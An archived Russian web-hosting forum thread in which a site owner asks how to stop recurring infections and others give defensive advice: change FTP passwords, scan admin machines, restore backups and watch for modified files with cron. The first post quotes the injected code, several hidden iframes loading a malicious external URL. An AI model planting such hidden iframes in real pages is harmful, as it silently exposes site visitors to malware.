ребята как бороться с етой дрянью. к индекс.пхп. или индекс. хтмл прикрепляется ета зараза. как с ней бороться. 5 сайтов уже с завидной периодичностью ловят ету фигню.
<?php
include ("index.htm");
?>
<iframe qcpjv='nGv9mnLg' iqhwy='YioVJo0r' pnpbb='gboWc5id' uvbob='ImYxCK2n' wdvnm='wRBzTgBW' src='http://veryblomar.com/vb/in.cgi?2 ' vuxec='DjubMago' xkufc='4unFeW4f' cjhnp='toBIziJG' gyonk='enHcPVx8' cmbis='o3vGyWbt' width='673' height='68' style='display:none'></iframe>
<iframe ebayi='AjfUbAa7' vvfjk='TDX8CLT8' yigak='Z35AfhJI' cteuq='vmRCc6sR' evkcr='LHVYoU5O' sqdpi='9YsDByRL' src='http://veryblomar.com/vb/in.cgi?2 ' svpvu='O0FYRCFt' xwnkp='WCykiUyf' fanei='3wd1pyg0' cwcpt='BNFWLQK3' jpsih='165F4aXy' stsnx='w8mJn7Ib' width='130' height='558' style='display:none'></iframe>
<iframe juysd='O2pUzczM' rfvrx='OmRvLgNq' fmhmk='uav6B2Cv' ewvob='Uac9ExhZ' hlyof='RoQYbBMW' kimup='bAJ9aZtq' src='http://veryblomar.com/vb/in.cgi?2 ' oyhat='0PcqLv3V' tmjbd='yRywIten' wxwlt='cLyiHDlA' iaoub='Ybe5RgR5' qfxlh='dWw0Q8Oy' bnphq='oGtl1fpt' width='395' height='137' style='display:none'></iframe>
<iframe eocau='64Ovmc35' iiprl='xBmGZkDy' src='http://veryblomar.com/vb/in.cgi?2 ' jypvx='GE9Zx8M8' oxojc='jmNGrnei' kpkss='12p6fcfq' ecxtm='pJmEhf3C' ekfsy='6IOqLh3I' width='778' height='441' style='display:none'></iframe>
<iframe eocau='64Ovmc35' iiprl='xBmGZkDy' src='http://veryblomar.com/vb/in.cgi?2 ' jypvx='GE9Zx8M8' oxojc='jmNGrnei' kpkss='12p6fcfq' ecxtm='pJmEhf3C' ekfsy='6IOqLh3I' width='778' height='441' style='display:none'></iframe><iframe juysd='O2pUzczM' rfvrx='OmRvLgNq' fmhmk='uav6B2Cv' ewvob='Uac9ExhZ' hlyof='RoQYbBMW' kimup='bAJ9aZtq' src='http://veryblomar.com/vb/in.cgi?2 ' oyhat='0PcqLv3V' tmjbd='yRywIten' wxwlt='cLyiHDlA' iaoub='Ybe5RgR5' qfxlh='dWw0Q8Oy' bnphq='oGtl1fpt' width='395' height='137' style='display:none'></iframe><iframe ebayi='AjfUbAa7' vvfjk='TDX8CLT8' yigak='Z35AfhJI' cteuq='vmRCc6sR' evkcr='LHVYoU5O' sqdpi='9YsDByRL' src='http://veryblomar.com/vb/in.cgi?2 ' svpvu='O0FYRCFt' xwnkp='WCykiUyf' fanei='3wd1pyg0' cwcpt='BNFWLQK3' jpsih='165F4aXy' stsnx='w8mJn7Ib' width='130' height='558' style='display:none'></iframe><iframe qcpjv='nGv9mnLg' iqhwy='YioVJo0r' pnpbb='gboWc5id' uvbob='ImYxCK2n' wdvnm='wRBzTgBW' src='http://veryblomar.com/vb/in.cgi?2 ' vuxec='DjubMago' xkufc='4unFeW4f' cjhnp='toBIziJG' gyonk='enHcPVx8' cmbis='o3vGyWbt' width='673' height='68' style='display:none'></iframe>
Полная версия: вирус
Онлайн-форум hostobzor.ru > Архив (темы до 1.06.2015). Только для чтения. > Коммерческий хостинг. Общие форумы > Общие вопросы
Пароли значит уводят. Меняйте пароли, проверяйте компы админов сайта на вирусы, сам сайт на шелы.
точно дело в паролях?
Как правило да, в основном это по фтп индексы меняют
Цитата(casper @ 14.07.2008, 01:30) 
точно дело в паролях?
НУ смотрите дату изменения, смотрите логи, и все станет на свои места.
Этот вопрос уже не раз поднимался
Цитата(casper @ 14.07.2008, 01:30)
точно дело в паролях?
Обычно, да.
Саша, пути два и оба начинаются одинаково - смена паролей. Потом либо ковыряетесь на сайте, если хорошо знаете из чего он у Вас должен состоять, либо сносите весь сайт на сервере и заливаете всё по-новой из чистой локальной резервной копии. Пароли уводят чаще всего через скрипты форума, поэтому сходите на сайт разработчика и возьмите все последние обновления, если у Вас установлен какой-нибудь популярный бесплатный форум.
Петр, небольшое дополнение к Вашему сообщению:
меняете пароли и НЕ сохраняете их ни в браузере, ни в FTP клиенте. + проверка машин с которых производится доступ антивирусами.
меняете пароли и НЕ сохраняете их ни в браузере, ни в FTP клиенте. + проверка машин с которых производится доступ антивирусами.
Цитата(kolobok @ 14.07.2008, 11:09)
Петр, небольшое дополнение к Вашему сообщению:
меняете пароли и НЕ сохраняете их ни в браузере, ни в FTP клиенте. + проверка машин с которых производится доступ антивирусами.
Да, существенное дополнение.
было один раз такое у меня.
грешил на скрипт форума и на локальную машину(в этот момент загруженую под виндой).
делал все вышеперечисленное. помогло.
сначала почистил кеш браузера на локале > скачал каспера проверил комп > сменил все пароли на локале в прогах и на сервере ( даже на тех сайтах где не было) > и только потом восстановил из бэкапа > проверил и сменил все чмоды на конфиги и темповые папки ( попутно проверяя что-бы скрипт не потерял работоспособность).
пока кеш не почистил в браузере, заражал каждую последующую копию бэкапа уже сам и удивлялся))
была чистая, на локале-же смотрел индексный файл, а закачал опять ифрейм. а он зараза , когда я открывал файл, в этот момоент и прописывался туда опять.
p/s пароли в фтп клиентах, на локале, храню теперь в обязательном порядке но не те, а абракадабру . теперь если хоть уведут, будет по логам видно что за умник ломится с ними на фтп.
ну и соответственно пора на локале шмон наводить))
...
добавлено позже:
ну и на первое время примитивно воткнул проверку по крону что-то вроде :
find public_html -mtime -24 -name "*php"
теперь на мыло приходят отчеты вида:
public_html/class/class.script.php
public_html/template_c/%%83^832^8....4D2%%galerie_popup.tpl.php
public_html/template_c/%%51^514^59......C%%admin_config.tpl.php
-----------
тоесть есть шанс, что туда он не додумается заглянуть и соответственно раз в сутки знаешь, на какие файлы стоит обратить внимание в случае чего.
так как файлы всегда практически одни и те-же использует скрипт при ежедневной работе. и знаешь что если что-то лишнее появилось, то можно и посмотреть его.
не панацея но лучше чем ничего. и от скрипта не зависит.
ну а над строкой можно и похимичить еще, подстроив под себя.
грешил на скрипт форума и на локальную машину(в этот момент загруженую под виндой).
делал все вышеперечисленное. помогло.
сначала почистил кеш браузера на локале > скачал каспера проверил комп > сменил все пароли на локале в прогах и на сервере ( даже на тех сайтах где не было) > и только потом восстановил из бэкапа > проверил и сменил все чмоды на конфиги и темповые папки ( попутно проверяя что-бы скрипт не потерял работоспособность).
пока кеш не почистил в браузере, заражал каждую последующую копию бэкапа уже сам и удивлялся))
была чистая, на локале-же смотрел индексный файл, а закачал опять ифрейм. а он зараза , когда я открывал файл, в этот момоент и прописывался туда опять.
p/s пароли в фтп клиентах, на локале, храню теперь в обязательном порядке но не те, а абракадабру . теперь если хоть уведут, будет по логам видно что за умник ломится с ними на фтп.
ну и соответственно пора на локале шмон наводить))
...
добавлено позже:
ну и на первое время примитивно воткнул проверку по крону что-то вроде :
find public_html -mtime -24 -name "*php"
теперь на мыло приходят отчеты вида:
public_html/class/class.script.php
public_html/template_c/%%83^832^8....4D2%%galerie_popup.tpl.php
public_html/template_c/%%51^514^59......C%%admin_config.tpl.php
-----------
тоесть есть шанс, что туда он не додумается заглянуть и соответственно раз в сутки знаешь, на какие файлы стоит обратить внимание в случае чего.
так как файлы всегда практически одни и те-же использует скрипт при ежедневной работе. и знаешь что если что-то лишнее появилось, то можно и посмотреть его.
не панацея но лучше чем ничего. и от скрипта не зависит.
ну а над строкой можно и похимичить еще, подстроив под себя.
можно я так отвечу?
http://forum.ruweb.net/viewthread.php?tid=2007
http://forum.ruweb.net/viewthread.php?tid=2007
Я бы еще добавил что желательно пользоваться проверенными FTP-клиентами взятыми из надежных источников, так как известны случаи скачивания из сети ломаных CuteFTP содержащих трояны.
короче я пришел домой и перезалил файлы. все вроде нормально стало. осталось узнать как php-nuke движок обновить. не кто не знает как можно быстро публиковать статьи прям из файлов 1.doc / выгрузка. очень бы помогло нам а то тратится дофига времени на их публикацию
не понос так золотуха
теперь нас досят
http://ru.search.yahoo.com/bin/query?p=%D1...cq&ei=UTF-8
http://www.google.com/search?ie=UTF-8&...%87%D0%B0%20icq
http://yandex.ru/yandsearch?text=%F0%E0%E7%E4%E0%F7%E0+icq
видимо нас досит freeicq.ru
но ето только мои домыслы
теперь нас досят
http://ru.search.yahoo.com/bin/query?p=%D1...cq&ei=UTF-8
http://www.google.com/search?ie=UTF-8&...%87%D0%B0%20icq
http://yandex.ru/yandsearch?text=%F0%E0%E7%E4%E0%F7%E0+icq
видимо нас досит freeicq.ru
но ето только мои домыслы
Цитата(casper @ 05.08.2008, 20:53)
не понос так золотуха
теперь нас досят
http://ru.search.yahoo.com/bin/query?p=%D1...cq&ei=UTF-8
http://www.google.com/search?ie=UTF-8&...%87%D0%B0%20icq
http://yandex.ru/yandsearch?text=%F0%E0%E7%E4%E0%F7%E0+icq
видимо нас досит freeicq.ru
но ето только мои домыслы
Обычно такие "трояны" пользуют либо для генерации трафика, либо для массивного DDoS, если заражено достаточное количество популярных сайтов(в код просто вставляется <iframe>).
Очень часто ни пользователи, ни владельцы сайта даже не подозревают о этом. Посмотрите по логам, откуда к вам больше всего рефереров и просмотрите код сайта. Увидите подобный код или <iframe> - обращайтесь к хостеру сайта.
нет проблему с вирусами решили.
теперь занимаемся борьбой с досей
по вашему личному опыту ddos ят кого больше. тех у кого движок форума старый. или просто сайт мешает какимто планам?
теперь занимаемся борьбой с досей
по вашему личному опыту ddos ят кого больше. тех у кого движок форума старый. или просто сайт мешает какимто планам?
Совершенно неважно. Досят конкурентов - по бизнесу, со схожими по тематике сайтами и т.д. Мало-ли какая причина...
Это текстовая версия — только основной контент. Для просмотра полной версии этой страницы, пожалуйста, нажмите сюда.